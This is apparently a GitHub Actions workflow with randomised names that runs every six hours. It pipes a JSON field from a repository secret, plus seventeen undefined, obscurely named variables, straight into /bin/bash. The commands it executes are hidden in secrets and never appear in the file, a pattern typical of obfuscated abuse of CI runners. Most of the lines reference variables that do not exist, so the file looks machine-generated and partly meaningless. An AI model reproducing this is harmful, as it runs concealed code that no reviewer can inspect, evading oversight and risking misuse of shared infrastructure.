name: caochenxi8710

on:
  workflow_dispatch:
  schedule:
    - cron: '2 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caochenxi8710
        env:
          eql39710: ${{ secrets.eql39710 }}
        run: |
          echo $eql39710 | jq -r .tgux53 | /bin/bash
          echo $fxm7 | jq -r .dj88 | /bin/bash
          echo $e1 | jq -r .y9 | /bin/bash
          echo $d33160 | jq -r .luklm93 | /bin/bash
          echo $gs5563 | jq -r .vn8 | /bin/bash
          echo $pjfgq444 | jq -r .qldz7 | /bin/bash
          echo $w02 | jq -r .n1 | /bin/bash
          echo $lq106 | jq -r .djhn691 | /bin/bash
          echo $l6 | jq -r .wif34 | /bin/bash
          echo $nbwo782 | jq -r .uaw96735 | /bin/bash
          echo $dln5 | jq -r .jwfyv71 | /bin/bash
          echo $spwk0908 | jq -r .vrdm54 | /bin/bash
          echo $nqg8468 | jq -r .adhrq363 | /bin/bash
          echo $hnkog51060 | jq -r .jbo794 | /bin/bash
          echo $vjs27 | jq -r .cnj46 | /bin/bash
          echo $phk7 | jq -r .fzth6231 | /bin/bash
          echo $erfox539 | jq -r .b40 | /bin/bash
          echo $ccpyg3 | jq -r .at035 | /bin/bash

